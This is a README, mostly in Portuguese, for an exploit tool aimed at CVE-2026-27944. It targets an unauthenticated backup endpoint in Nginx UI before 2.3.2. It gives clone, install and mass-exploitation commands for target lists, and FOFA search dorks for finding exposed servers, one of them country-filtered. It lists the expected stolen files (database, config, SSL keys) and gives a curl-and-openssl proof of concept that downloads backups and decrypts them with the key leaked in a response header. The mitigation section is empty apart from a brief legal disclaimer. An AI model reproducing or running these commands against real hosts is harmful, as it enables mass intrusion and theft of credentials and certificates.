
Suka suka lah
🚀 CVE-2026-27944: Exploração de Backup Não Autenticado do Nginx UI
📌 Descrição
27944.py é uma ferramenta de exploração para CVE-2026-27944 que permite ao atacante baixar e descriptografar backups do Nginx UI sem autenticação.
Esta vulnerabilidade está presente no Nginx UI versão < 2.3.2 e permite acesso a:
🔧 Recursos
🛠️ Como Instalar
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 Como Usar
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 Formato dos Alvos
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 Dork FOFA
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 Resultado da Saída
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ Aviso Legal
Esta ferramenta foi criada para fins educacionais e de teste de segurança ética. O autor não se responsabiliza pelo uso indevido desta ferramenta. Use apenas em sistemas que você possui ou para os quais tenha autorização por escrito para testar.
📝 Explicação Técnica
CVE-2026-27944 é uma vulnerabilidade crítica no Nginx UI que permite ao atacante acessar o endpoint /api/backup sem autenticação. O backup contém dados sensíveis criptografados com AES-256, porém a chave e o IV são enviados através do cabeçalho X-Backup-Security no formato Base64.
Pontuação CVSS: 9.8 (Crítico)
Versão Afetada: Nginx UI < 2.3.2
Mitigação:
💀 Prova de Conceito
# Verificar vulnerabilidade
curl -I http://target:9000/api/backup
# Baixar backup
curl -s http://target:9000/api/backup -o backup.bin
# Descriptografar backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip